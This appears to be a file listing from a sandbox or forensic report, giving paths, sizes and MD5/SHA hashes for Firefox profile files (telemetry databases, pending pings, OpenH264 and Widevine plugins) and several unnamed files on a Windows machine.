SHA512d926ff4557923470d8a1970b0e5e9ae6df8d5d8ba38b775b5ca2ada5eef26750e431838da6400c69cc9dfb062ac7f84d6d15fe4b1ba74f6a2e193af991af7e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.bin
Filesize24KB
MD565e5253ac4790081266f721e9cea012d
SHA1f689e4a4c8e571bb7e25af370f9fd5e402293b4b
SHA2569cab86b42a4e0fa3ef94285076bd4a69f5c4282fcfc2afdf0e3e97256c56abaf
SHA512b891583ca2a24b49a9b6ec24edf9e21a55b7f22e7b29c1ab427b5b23366cd77fb82a288fd8aac33a44c6922751cda9f487d23402319bfd2bc78dae1ff9b0db1d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.bin
Filesize5KB
MD5a262317650abb1721f67533e442b2fe8
SHA1590cda30965a91c8a2fb492ce62e910048cb5aed
SHA2567c49e59e4d67ee830f1534eaf4e31c0c2126d59cac912b101546ef411a2dabbb
SHA5121365eeed97641725f4c6f5e99c96910c61bda2cacb352b086bdf0181ebc591c9f7b8b72a177118f472cc70860b15feb1e0d401013897805fe6755bbdae839aa1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.bin
Filesize27KB
MD5a529616deaff89d74589df9343ad41ad
SHA1a2d1f2333ae4035bbee3b753e26bd15c04498c25
SHA256dbf50f3bbf783cdabea8120ad2ce100783fe6ce8c7cadbf17ee8e60b9af89c66
SHA51266b7b454e58ba14b461e41ea9084c44fa4b871b76c507d00b2bc5ea1f6548f095f36d468ef4cdf82644d08fcd3ad9955424c99bac4c3c961d8270a5b46185779
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD5d550dcb571b4d05ebdfe12c56a2e35f9
SHA119012313e52388166e693e6c9b521d788eac97c8
SHA2565140cef26456a09cd5b245340be5a5c220d8921ac84cf4a7caf3b811f5ce92de
SHA51292a30379a68c0cd2a7313110f9e29a14f381fade7021ff9a3aa6a7d5abdd9c238d06ed95eac110cd73a43b2b620ed71e72f706fbe43eaf5458b01e1e553d36ca
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD54433b2974cc1991853eb330aba5f2d5d
SHA138b93f0a60a7f28618e7729b5daf6562261e1256
SHA256815e3c720e9ce5a2f6f69b6e3ee2e1c58baeb22c54fa70537da7e76555727d7e
SHA5127c7404010181524d8f789ff9d0456b19a1aa335248e9dc355c75e860884fa74f48fa223e0dbf02366f0855509e0c7ce0549366b718fd53f06f0ffa558c1fa83f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5de5a51a31b2252be6b8b5afc43db6804
SHA125e38b14bf7e7eeb99e46d5ddecf68be5355f6c4
SHA25647570a91a58f6994050c0b7cb5956e362281ed9fbe24f139a1896c82c6cd9957
SHA512a140a209781ba59b20c50f25c9642e5d3f710035a0e87ea22a34e1f499d959c49699f47bfc492a5d9075092082a98a9e1b371be0da1e19e14a3d11269e110173
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD56909f4c81e9f408b834227362977d512
SHA104b4a5416a2d2ec048e5744f459b9290b1aade4b
SHA256bd931cde0d5ae6606492868532804dbaa26ff938b2c70bfc7ae3411f7c62825d
SHA512ba0551286e114d60f14fb4f141fd826ad759d78c844aff37ab1777258a0bb6921dc9d20831e030652c830eb6dbf7911264702e8664a8fb22a0f7ab845940a47c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
Filesize14KB
MD5da5be3c197ba5ec78dd7dac8f03cabf5
SHA1d0dbe71c35726f747eebc653686d422981ec75a9
SHA25625baaadf208b08789ee4ebfe3841ec81dea7874a066a0c69da5c1b942adde4ef
SHA5128feb56809d0137772c2a502f4712efbafe712be5264e3e5204844133a47dec114e2a53baaf0c4c075b8a8e0e620e2efd90fb578055b64b3ef8ca97b35792e541
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
Filesize28KB
MD5667bd9c674ae4b564bcb4f9a98e6a876
SHA1a1311f4a46e67aa51a507c68842b0a689653f7f6
SHA256efac92249e2d9bda9176f99163d9e05d1ff76f95cf8311f940214571fc12bea4
SHA512720bc7fb016a2a21b1f2a6526723f204e4d0f5f2914ae67394cea2de51ad682fc7689613aa0d78fbe5fa65ef15e02aa4926d51207889b404cc9ee41168003fc5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\3bdcc59c-b4cf-40c1-96ea-33a541bac884
Filesize671B
MD5f7b2823dd4bdabb7d33b64b2929b6575
SHA12e5a3a525776c179c4353f33faa2e5cf718981b3
SHA2566313c32085f4f982f2b3ad2a297fa3f06ef75951a7aa15e89b7bf4ef7ee9d6f1
SHA512c9bb26f4a501253eda97228b7780290e8af502894759b92528b36b533e2ce80ef953963052c89105f1d14e5d050b42669077665b9cae2675c32cd97c2b093775
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\936e0a20-52f7-4fbb-b8d0-33a71dd73b7c
Filesize982B
MD5aedb52eb580c0d5ad259a3416d61f1c5
SHA1635625ed800d88d1c8debcb35554c01b5a646fe8
SHA25660b94fe31b0c955d695c74eae585607da4a4ce2ac78065ce89f8d87bb8a13ca7
SHA5121210af6aa678706a4a7e66a6955b6f7978b14c972b77eedd2bef7f72f3507020f0743a6373dcac6eb95b57bb9b35b3042abcb8d473856fb960385de85c7901ba
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\c476540f-1512-49f2-a450-270283636e9c
Filesize29KB
MD531e5fa81c2bb5e19c56b31a7a331fbd2
SHA1ca5492d47eb429f44388ec512d1bd1e38e0f742a
SHA2561f13e7e39f85339ab3fd1b6e7d208056751589e1d8f6bd9274d8e043f6263f11
SHA5120841e80b083c014f9d9076d0408bedd3ae28eff14b258b90779da0eb0fc137e2cb26b192e2f651ef209f33ba507853b1cb82855812b7991c6ac745501d616746
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
11KB
MD5d6cf64d17360da4e8a1ebaece435f77a
SHA14f317b107d4e9003b707fb81a935fb1cab15033c
SHA2566cd587fcd7b08c6494de8a4f48b4a782290bfe3ea6419a988a333031eacbce67
SHA512fcf21fd94e48b78eac5194f637b402302142b7db2c1ec56d01e0273104285be11a73695689177d336fe9dfef951a9d9f9fb689294d83b0381c91eeedc8db8317
-
Filesize
10KB
MD5802e8343dc7b4aefb2f2a056c75b8dfd
SHA17cae60203fd9075f2d9a500aeed72e2207f0317c
SHA256a641041802cd13a5f455f5f284f5ab84ab350ffa20aa5c2779441225234f750b
SHA512a5c3567870a94f9777761cb14e63ff0e0a662dcd6394177944707fae84e15ff7a019268bb649d6dd3190ce50445b8094e64b610378e096acdf53ae0be3999ac1
-
Filesize
10KB
MD53342eb25ac42a60a5a1ffb2547659667
SHA162c1a475b45ac1ca60d770df2d117e7cee3b3f6a
SHA256bd4343940ef1d923a511a42d1352f35e2c1936905765159a7a6028eeb9398e38
SHA5127961a04f39c3519d4c4d742a00cc6b56fd5ad0336b5420a7fe9c49503f796f763d3860b63341c42627aa7932edb3c10a85188bd319ec054e39e277784b3bbb24
-
Filesize
202KB
MD5ba84dd4e0c1408828ccc1de09f585eda
SHA1e8e10065d479f8f591b9885ea8487bc673301298
SHA2563cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852
SHA5127a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290
-
Filesize
1.0MB
MD5971b0519b1c0461db6700610e5e9ca8e
SHA19a262218310f976aaf837e54b4842e53e73be088
SHA25647cf75570c1eca775b2dd1823233d7c40924d3a8d93e0e78c943219cf391d023
SHA512d234a9c5a1da8415cd4d2626797197039f2537e98f8f43d155f815a7867876cbc1bf466be58677c79a9199ea47d146a174998d21ef0aebc29a4b0443f8857cb9
-
Filesize
144KB
MD5cc36e2a5a3c64941a79c31ca320e9797
SHA150c8f5db809cfec84735c9f4dcd6b55d53dfd9f5
SHA2566fec179c363190199c1dcdf822be4d6b1f5c4895ebc7148a8fc9fa9512eeade8
SHA512fcea6d62dc047e40182dc4ff1e0522ca935f9aeefdb1517957977bc5d9ac654285a973261401f3b98abf1f6ed62638b9e31306fd7aaeb67214ca42dfc2888af0
-
Filesize
1.2MB
MD5577cd52217da6d7163cea46bb01c107f
SHA182b31cc52c538238e63bdfc22d1ea306ea0b852a
SHA256139762e396fb930400fab8faab80cb679abbe642144261cba24973fb23bcd728
SHA5128abad4eaf2a302dfd9ead058e8c14d996437975730125c46d034a71028921ff36ff5d157ad3671e328ac667ec8095db19fa14a9e8eaaf1a7738aa3d0120b5474
-
Filesize
24.1MB
MD527cc12974bf481461261f327ea2720de
SHA1a56dfbec9ab3b48f94525743db08a83296c4e16d
SHA25650d1abb681e8cf1cd41c628d3505735271e016190334bc971723f877cf33e0e8
SHA51264415896832f03232d605bc4137c51ac2f80baae7389f353fb7e8b597c949dbeb1fd35851ad385661d1d197fa41f6060cef55802181fc0b06a24caf6e5233fb5
-
\??\Volume{612d9cf5-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{3ca229d4-42b3-4c22-8df5-32368fff500f}_OnDiskSnapshotProp
Filesize6KB
MD50e7b45a48cda84f5df30c69d8c063945
SHA17835bbe70c63fd5ddaad0509a5677d9fda748010
SHA256455e16c621e90adbc62a9c7a2eae3316489565091b78c4e73470b96f85642e5f
SHA512b69aa77d49b6f13b7a4afa251fe232e7b513d312afff7fae80b333eb06ade8bbdb0eadd4975d7cbf9d13d2492fdd0ede0ddcd116fc613d23c7d702ee53f1885e